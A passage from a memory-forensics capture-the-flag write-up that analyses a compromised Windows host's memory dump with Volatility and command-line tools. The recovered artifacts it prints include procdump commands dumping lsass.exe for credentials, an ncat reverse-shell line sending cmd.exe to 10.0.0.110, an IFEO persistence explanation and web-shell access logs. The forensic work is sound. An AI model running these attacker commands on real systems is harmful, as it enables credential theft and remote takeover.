└─$ strings SECURITYNIK-WIN-20231116-235706.dmp | grep --perl-regexp 'http*://10.0.0.108:(443|9999).*' --only-matching | sort --unique | grep --perl-regexp '(\.exe|\.txt)' | sed 's/"//'
http://10.0.0.108:9999/putty_64.exe
http://10.0.0.108:9999/putty_64.exe)
http://10.0.0.108:9999/putty.exe
http://10.0.0.108:9999/putty.exe
http://10.0.0.108:9999/putty_x64.exe
http://10.0.0.108:9999/putty_x64.md5.txt
Q: Where is/are the executable file(s) seen in the previous question stored on the system?
A: The executable files is stored primarily in the c:\users\securitynik\Downloads folder
We can see above the locations of where the files were stored on the file system.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ strings SECURITYNIK-WIN-20231116-235706.dmp | grep --perl-regexp 'putty.*?\.exe' | grep --ignore-case --perl-regexp "^c:.*?\.exe$"
C:\Users\securitynik\Downloads\putty_x64 (2).exe
C:\Users\securitynik\Downloads\putty_64.exe
C:\TOOLS\elitewrap\original_putty.exe
C:\Users\securitynik\Downloads\putty.exe
C:\Users\securitynik\Downloads\putty.exe
C:\Users\securitynik\Downloads\putty_new.exe
Extracting data from the file system. Grabbing all the files found storing them in a txt file for further analysis.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir 4852/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.filescan > filescan.txt
Progress: 100.00 PDB scanning finished
Q: When performing a filescan, how many files/lines were returned?
A: There were 8035 lines found but 8029 files.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | awk --field-separator=' ' '{ print $2 }' | sed '1,4d' | sort | head --lines -6 | wc --lines
8029
Q: Similarly, how many unique files were returned?
A: There were 3227 unique files returned. Note, there were 6 lines reported with non-ASCII characters.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | awk --field-separator=' ' '{ print $2 }' | sed '1,4d' | sort | uniq | head --lines -6 | wc --lines
3227
Q: What were the top 10 files/lines found. Note, in this case directory paths would also be considered as files for this purpose?
A:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | awk --field-separator=' ' '{ print $2 }' | sed '1,4d' | sort | head --lines -6 | uniq --count | sort --numeric-sort --reverse | head --lines=10
1480 \$Directory
469 \Program
359 \Users\securitynik\AppData\Local\Google\Chrome\User
223 \$MapAttributeValue
172 \Users\securitynik\AppData\Local\Microsoft\Edge\User
158 \CMNotify
140 \Windows\System32
109 \Windows\Registration\R000000000006.clb
107 \Endpoint
77 \Windows\System32\svchost.exe
....
Q: Of these unique files, how many are text (".txt") files and what are their counts?
A: 3 Files returned with .txt extension.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | awk --field-separator=' ' '{ print $2 }' | sed '1,4d' | sort | head --lines -6 | uniq --count | sort --numeric-sort --reverse | grep ".txt"
1 \xampp\readme_de.txt
1 \Windows\appcompat\pca\PcaAppLaunchDic.txt
1 \Users\securitynik\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
We know above, that PowerShell was a cause of concern. Maybe this "ConsoleHost_history.txt" file has information that may be able to help us understand what transpired. We did not get enough insights from the command line output. Maybe, just maybe, there is something useful in this file. Time will tell.
From the list of files returned, there seems to be a mapped/network drive.
Q: What is the drive letter associated with the mapped/network drive?
A: Z:
Q: What is the path of this mapped/network drive?
A: \;Z:00000000000fc3bd\vmware-host\Shared
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | awk --field-separator=' ' '{ print $2 }' | sed '1,4d' | sort | head --lines -6 | tail --lines=2 | sort --unique
\;Z:00000000000fc3bd\vmware-host\Shared
Preparing to dump the contents of the PowerShell history file. Create a folder to story the files.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ mkdir powershell_history && ls powershell_history
Get the address of the PowerShell history from the filescan.txt file.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | grep "\ConsoleHost_history.txt"
0xe78bf2f82a00 \Users\securitynik\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt 216
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir powershell_history/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf2f82a00
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf2f82a00 ConsoleHost_history.txt file.0xe78bf2f82a00.0xe78bf66cc6d0.DataSectionObject.ConsoleHost_history.txt.dat
Q: What network scanning tool was being searched for via the command prompt?
A: nmap.exe
Q: What is the command used to perform the search?
A: "dir /s c:\nmap.exe"
Q: What is in this PowerShell history file? As in reconstruct this file to get its contents.
A: The commands that were run on the host inside of the PowerShell prompt as seen below
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat powershell_history/file.0xe78bf2f82a00.0xe78bf66cc6d0.DataSectionObject.ConsoleHost_history.txt.dat
Invoke-WebRequest -Uri http://10.0.0.106/putty.exe
dir
cd ..
dir
Invoke-WebRequest -Uri http://10.0.0.106/putty.exe putty.exe
exit
d:
cmd
exit
cd \
cd tools
cd .\SysinternalsSuite\
.\procdump.exe -ma lsass.exe c:\tmp\lsass.dmp
ps
.\procdump.exe -ma TabTip tabtip.dmp
.\procdump.exe -ma msedge.exe msedge.dmp
del *.tmp
del *.dmp
dir *.dmp
del .\notepad.dmp .\firefox.dmp
del .\FindLinks.exe
del .\firefox.dmp
cd \
cd tools
cd .\SysinternalsSuite\
del .\firefox.dmp
.\procdump.exe -ma msedge.exe c:\tmp\edge.dmp
dir c:\tmp\edge.dmp
.\procdump.exe -ma lsass.exe c:\tmp\lsass.exe.dmp
dir c:\tmp
.\procdump64.exe /?
.\procdump.exe -64 -ma lsass.exe c:\tmp\lsass.exe.dmp
.\procdump.exe -accepteula -64 -ma lsass.exe c:\tmp\lsass.exe.dmp
cls
psexec -h
cmd
cd 'C:\Program Files\'
dir
cd ..
cd '.\Program Files (x86)\'
dir
cd .\Microsoft\
dir
cd .\Edge\
dir
cd .\Application\
dir
cd .\114.0.1823.79\
dir
.\msedge.exe --proxy-server="socks5://127.0.0.1:9999"
cd "c:\Program Files (x86)\Google\Chrome\Application\"
cd "c:\Program Files (x86)\Google\Chrome\Application\"cd ..
cd ..
cd \
cd '.\Program Files\'
dir
cd .\Google\
dir
cd .\Chrome\
dir
cd .\Application\
dir
chrome.exe --proxy-server="socks5://127.0.0.1:9999"
dir
chrome.exe --proxy-server="socks5://127.0.0.1:9999"
cmd
dir /s c:\nmap.exe
Summary of file contents
Above confirms some of what we saw before. Let's however take a quick synopsis.
invoke-webrequest was used to download the putty.exe file. We also see attempts to dump the lsass.exe process which contains all the credential information. We can see procdump was run multiple times in different forms in an attempt to dump lsass.exe. Maybe these failed?!
One common tool used for dumping passwords is mimikatz, maybe we should check if this was found in the files.
Q: Was minimkatz found within this memory dump?
A: Yes
Q: If Yes: What is the path it can be found in?
A: C:\TOOLS\mimikatz_trunk
We also see attempts to dump tabtip and msedge.exe from the memory using procdump. All *.tmp and *.dmp files were deleted along with some other files. We also see attempts to use msedge.exe with the proxy server which was setup earlier. Maybe that did not work, then the attempt was made to use chrome.exe. We also see a search on the cmd.exe shell for nmap.exe.
While we are here. There is a batch file (".bat") that was found.
Q: What does "ifeo" stand for?
A: IFEO stands for Image File Execution Options. In this case, I can configure this batch file to run whenever notepad (or any other application) is started. This way, whenever you run notepad (or that application), execute this script and gain access to your computer.
Make a directory to dump ncat.exe contents.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ mkdir ncat_dump
Extract the file at that memory address.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir ncat_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6e4f250
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf6e4f250 ncat-ifeo.bat file.0xe78bf6e4f250.0xe78bf66a8910.DataSectionObject.ncat-ifeo.bat.dat
Q: What is the virtual address of this file?
A: The address of the .bat file is at "0xe78bf6e4f250"
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | grep --perl-regexp '\.bat'
0xe78bf6e4f250 \TOOLS\ncat-ifeo.bat 216
Q: What is the contents of this file?
A: See below.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat ncat_dump/file.0xe78bf6e4f250.0xe78bf66a8910.DataSectionObject.ncat-ifeo.bat.dat
cmd.exe /c start c:\tools\ncat.exe --nodns --verbose 10.0.0.110 80 --exec cmd.exe
Q: What will be achieved when this command is run?
A: Looking at the ifeo.bat file, we see the host is configured to send its shell (cmd.exe) to the device at 10.0.0.110 on port 80. While the port is different, this is similar to what we saw with the persistence mechanism earlier. Even more reason to conclude the attacker may be at 10.0.0.110.
When looking at the file scan, we see saw two entries for ncat.exe.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | grep ncat.exe
0xe78bf6aa7120 \Program Files (x86)\Nmap\ncat.exe 216
0xe78bf6ad55c0 \Program Files (x86)\Nmap\ncat.exe 216
We can extract both files and confirm their hashes.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir ncat_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6aa7120
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
ImageSectionObject 0xe78bf6aa7120 ncat.exe file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir ncat_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6ad55c0
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
ImageSectionObject 0xe78bf6ad55c0 ncat.exe file.0xe78bf6ad55c0.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ md5sum ncat_dump/*
89dc4c7b0477978aa3b7dfb4e7a93163 ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
89dc4c7b0477978aa3b7dfb4e7a93163 ncat_dump/file.0xe78bf6ad55c0.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
45860d2ded9caca15c1d10e756e1a0c7 ncat_dump/file.0xe78bf6e4f250.0xe78bf66a8910.DataSectionObject.ncat-ifeo.bat.dat
Q: How many files are seen for ncat.exe?
A: 2
Q: If you had multiple files, are these files the same?
A: Yes. The hashes say they are.
Q: If they are, what makes you conclude so?
A: Their md5sum hash
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ md5sum ncat_dump/*
89dc4c7b0477978aa3b7dfb4e7a93163 ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
89dc4c7b0477978aa3b7dfb4e7a93163 ncat_dump/file.0xe78bf6ad55c0.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
Q: What type of "file" is this?
A: This is a Windows 32-bit executable. Here is the file information.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ file ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img: PE32 executable (console) Intel 80386, for MS Windows, 5 sections
Q: What architecture (x86 or x64) was it designed for?
A: 80386 or x86 or i386
Q: What OS is it designed to run on?
A: Windows
Q: What type of application is it? (GUI or console)?
A: Console Application
Q: How many sections are there in this file?
A: 5 Sections
Q: What is/are the name(s) of the section(s) header(s)
A:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ objdump ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img --section-headers
ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img: file format pei-i386
Sections:
Idx Name Size VMA LMA File off Algn
0 .text 000442dd 002e1000 002e1000 00000400 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE
1 .rdata 0000ccce 00326000 00326000 00044800 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
2 .data 00000600 00333000 00333000 00051600 2**2
CONTENTS, ALLOC, LOAD, DATA
3 .rsrc 000001e0 00336000 00336000 00051c00 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
4 .reloc 00003400 00337000 00337000 00051e00 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
Q: What is the name of the section at index 0?
A: .text
Q: What does this section typically contain?
A: The .text section is where the actual code is kept.
Q: What is the virtual memory address of the "AddressOfEntryPoint" for the executable?
A: 00044663. Indicates the location of the entry point of the application. Another way of looking at it, is the address from which the Windows loader will begin execution.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ objdump ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img --all-headers | grep 'AddressOfEntryPoint'
BFD: error: ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img(.reloc) is too large (0x3400 bytes)
AddressOfEntryPoint 00044663
Q: What is the file size of the extracted file?
Q: What is the File Modification Date/Time?
Q: What is the file Access Date/Time?
Q: What is the File Permissions?
Q: What I the "Linkver Version" used to link this file?
Q: What is the Time Stamp on the file?
Q: What is the OS Version, Image Version and Subsystem version?
Q: What is the Subsystem?
A: All the answers can be found below:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ exiftool ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
ExifTool Version Number : 12.67
File Name : file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
Directory : ncat_dump
File Size : 339 kB
File Modification Date/Time : 2023:12:07 09:35:35-05:00
File Access Date/Time : 2023:12:07 09:36:19-05:00
File Inode Change Date/Time : 2023:12:07 09:35:35-05:00
File Permissions : -rw-------
File Type : Win32 EXE
File Type Extension : exe
MIME Type : application/octet-stream
Machine Type : Intel 386 or later, and compatibles
Time Stamp : 2023:05:19 23:12:28-04:00
Image File Characteristics : Executable, 32-bit
PE Type : PE32
Linker Version : 14.29
Code Size : 279552
Initialized Data Size : 76288
Uninitialized Data Size : 0
Entry Point : 0x44663
OS Version : 6.0
Image Version : 0.0
Subsystem Version : 6.0
Subsystem : Windows command line
Q: What does the first 128 bytes of this file contain and what does it confirm?
A: The first 128 bytes contains the following:
This confirms this is a Windows executable.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ xxd -len 128 ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
00000000: 4d5a 9000 0300 0000 0400 0000 ffff 0000 MZ..............
00000010: b800 0000 0000 0000 4000 0000 0000 0000 ........@.......
00000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000030: 0000 0000 0000 0000 0000 0000 1801 0000 ................
00000040: 0e1f ba0e 00b4 09cd 21b8 014c cd21 5468 ........!..L.!Th
00000050: 6973 2070 726f 6772 616d 2063 616e 6e6f is program canno
00000060: 7420 6265 2072 756e 2069 6e20 444f 5320 t be run in DOS
00000070: 6d6f 6465 2e0d 0d0a 2400 0000 0000 0000 mode....$.......
Looking at prefetch files:
Q: How many prefetch files were returned?
A: There were 45 Prefetch files returned
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | grep --perl-regexp "\.pf" | awk --field-separator=' ' '{ print $2 }' | sort --unique | wc --lines
45
Analyzing the prefetch files, allow us to understand the number of times a program was run, the time the program was executed, etc.
Extracting the certutil.exe file.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | grep certutil -i
0xe78bf6e6ba90 \Windows\System32\certutil.exe 216
0xe78bf6e6e7e0 \Windows\Prefetch\CERTUTIL.EXE-28F1E0C1.pf 216
0xe78bf7934500 \Windows\System32\en-US\certutil.exe.mui 216
Q: What is the sha256 hash of this certituil.exe file found via the filescan:
A:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ sha256sum certutil_dump/file.0xe78bf6e6ba90.0xe78bf7065d40.ImageSectionObject.certutil.exe.img
e886ee1a0f92803e4b884ff099d9bbc717fe3cc6cd86f719d52f132776226493 certutil_dump/file.0xe78bf6e6ba90.0xe78bf7065d40.ImageSectionObject.certutil.exe.img
We know from our earlier analysis, we have a HTTP server.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat netstat.txt | grep http
0xe78bf3af4740 TCPv4 0.0.0.0 80 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af4740 TCPv6 :: 80 :: 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5920 TCPv4 0.0.0.0 80 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5ea0 TCPv4 0.0.0.0 443 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5ea0 TCPv6 :: 443 :: 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af4060 TCPv4 0.0.0.0 443 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
Q: What port(s) is the HTTP server listening on?
A: 80 and 443
Q: Is the server listening on IPv4, IPv6, None or both?
A: Both
Q: What is the name of the HTTP process?
A: httpd.exe
Q: What is the process ID(s) associated with the http process?
A: 10008, 5088
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pslist.txt | grep httpd
10008 8100 httpd.exe 0xe78bf6fb6080 1 - 1 False 2023-11-16 23:26:15.000000 N/A Disabled
5088 10008 httpd.exe 0xe78bf61b9080 156 - 1 False 2023-11-16 23:26:16.000000 N/A Disabled
Still dealing with files. This time specifically files associated with HTTP. More specifically, the "access.log" file.
Q: How many entries of the "access.log" file was returned?
A: There were 5 files returned
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | grep "access.log"
0xe78bf4c62130 \xampp\apache\logs\access.log 216
0xe78bf6e72980 \xampp\apache\logs\access.log 216
0xe78bf6e72ca0 \xampp\apache\logs\access.log 216
0xe78bf6e75d10 \xampp\apache\logs\access.log 216
0xe78bf6e76800 \xampp\apache\logs\access.log 216
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | grep "access.log" | wc --lines
5
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ mkdir access_log
Extract the files from their memory address:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir access_log/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf4c62130
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf4c62130 access.log file.0xe78bf4c62130.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
SharedCacheMap 0xe78bf4c62130 access.log file.0xe78bf4c62130.0xe78bf6564d20.SharedCacheMap.access.log.vacb
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir access_log/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6e72980
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf6e72980 access.log file.0xe78bf6e72980.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
SharedCacheMap 0xe78bf6e72980 access.log file.0xe78bf6e72980.0xe78bf6564d20.SharedCacheMap.access.log.vacb
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir access_log/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6e72ca0
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf6e72ca0 access.log file.0xe78bf6e72ca0.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
SharedCacheMap 0xe78bf6e72ca0 access.log file.0xe78bf6e72ca0.0xe78bf6564d20.SharedCacheMap.access.log.vacb
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir access_log/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6e75d10
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf6e75d10 access.log file.0xe78bf6e75d10.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
SharedCacheMap 0xe78bf6e75d10 access.log file.0xe78bf6e75d10.0xe78bf6564d20.SharedCacheMap.access.log.vacb
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir access_log/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6e76800
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf6e76800 access.log file.0xe78bf6e76800.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
SharedCacheMap 0xe78bf6e76800 access.log file.0xe78bf6e76800.0xe78bf6564d20.SharedCacheMap.access.log.vacb
Q: Upon dumping the memory address how many files are created?
A: 10 files were reported for the 5 memory addresses which were extracted:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ls
file.0xe78bf4c62130.0xe78bf6564d20.SharedCacheMap.access.log.vacb
file.0xe78bf4c62130.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
file.0xe78bf6e72980.0xe78bf6564d20.SharedCacheMap.access.log.vacb
file.0xe78bf6e72980.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
file.0xe78bf6e72ca0.0xe78bf6564d20.SharedCacheMap.access.log.vacb
file.0xe78bf6e72ca0.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
file.0xe78bf6e75d10.0xe78bf6564d20.SharedCacheMap.access.log.vacb
file.0xe78bf6e75d10.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
file.0xe78bf6e76800.0xe78bf6564d20.SharedCacheMap.access.log.vacb
file.0xe78bf6e76800.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024/access_log]
└─$ ls | wc --lines
10
Now that we have the files, let's answer the following question.
Q: What is/are the IP address(es) and its/their count(s) for the IP(s) seen in all the "access.log" files?
A:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat access_log/* | sort --unique | awk --field-separator='-' '{ print $1 }' | sort | uniq --count
...
57 10.0.0.1
19 10.0.0.110
There is a device which seems to be accessing our webserver with a non-standard GUI based browser.
Q: What is the IP of this host?
A: 10.0.0.110
Q: What is the HTTP Method/Verb used by this non GUI based browser tool?
A: "GET"
Q: What are the URLs accessed.
A: "/dvwa/vulnerabilities/exec/shell.php"
Q: What version of HTTP is in use?
A: HTTP/1.1
Q: What was/were the response code(s)
A: 200.
Q: For the response code(s), is/are this/these server and client codes?
A: Both Client and server. Server is 200 successful, 404 is client side error.
Q: What is the size of the smallest size of the object/response returned to the requestor using this non-GUI based browser?
A: 29
Q: What is the size of the largest size of the object/response returned to the requestor using this non-GUI based browser?
A: 2888
Q: What is the name of the non-standard GUI based browser?
A: curl
Q: What version of this non-GUI browser was being used?
A: 8.4.0
Below we see a sample of these entries.
See below for the answer to all the questions.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat access_log/* | sort --unique | grep --color=always --text 'curl'
10.0.0.110 - - [16/Nov/2023:18:19:50 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:20:11 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:24:45 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:26:37 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:26:54 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:28:01 -0500] "GET /dvwa/vulnerabilities/exec/main.php HTTP/1.1" 404 297 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:28:09 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:28:25 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:36:02 -0500] "GET /dvwa/hackable/uploads/shell.php HTTP/1.1" 404 297 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:36:09 -0500] "GET /dvwa/hackable/upload/shell.php HTTP/1.1" 404 297 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:37:32 -0500] "GET /dvwa/vulnerabilities/upload/shell.php HTTP/1.1" 200 29 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:41:22 -0500] "GET /dvwa/vulnerabilities/upload/shell.php HTTP/1.1" 200 2888 "-" "curl/8.4.0"
Q: When was the date of this version release and how many known vulnerabilities are associated with it?
A: Date of release was Oct 11, 2023 and there are 2 known vulnerabilities.
# Version Date Vulns
252 8.4.0 Oct 11 2023 2
Wrapping this section up
Q: What is the name of the Web Application being used and the platform it is running on?
A: The answer is seen above DVWA.
As for the platform, it is XAMPP, see below.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | grep dvwa
0xe78bf4c54e40 \xampp\htdocs\dvwa\dvwa\css\main.css 216
0xe78bf620d400 \xampp\htdocs\dvwa\config 216
0xe78bf620e530 \xampp\htdocs\dvwa\config 216
0xe78bf6aac8a0 \xampp\mysql\data\dvwa\db.opt 216
0xe78bf6ac6840 \xampp\htdocs\dvwa\vulnerabilities\exec\source\low.php 216
0xe78bf6e4fd40 \xampp\htdocs\dvwa\vulnerabilities\upload\index.php 216
0xe78bf6e5f100 \xampp\htdocs\dvwa\dvwa\includes\dvwaPage.inc.php 216
0xe78bf6e5f420 \xampp\htdocs\dvwa\config\config.inc.php 216
0xe78bf6e619a0 \xampp\htdocs\dvwa\index.php 216
0xe78bf6e635c0 \xampp\htdocs\dvwa\dvwa\js\dvwaPage.js 216
0xe78bf6e63d90 \xampp\htdocs\dvwa\dvwa\js\add_event_listeners.js 216
0xe78bf6e65b40 \xampp\htdocs\dvwa\favicon.ico 216
0xe78bf6e66c70 \xampp\mysql\data\dvwa\users.ibd 216
0xe78bf6e67da0 \xampp\htdocs\dvwa\dvwa\images\logo.png 216
0xe78bf6e680c0 \xampp\mysql\data\dvwa\guestbook.ibd 216
0xe78bf6e68a20 \xampp\htdocs\dvwa\vulnerabilities\upload\source\low.php 216
0xe78bf792b090 \xampp\htdocs\dvwa\vulnerabilities\exec\index.php 216
Let's learn a bit about the web server configuration, at the time of this host being compromised.
Create a directory to dump the HTTP contents.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ mkdir httpd_dump
Locate the memory address of the httpd.conf file
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | grep httpd.conf
0xe78bf6e61b30 \xampp\apache\conf\httpd.conf 216
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir httpd_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6e61b30
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
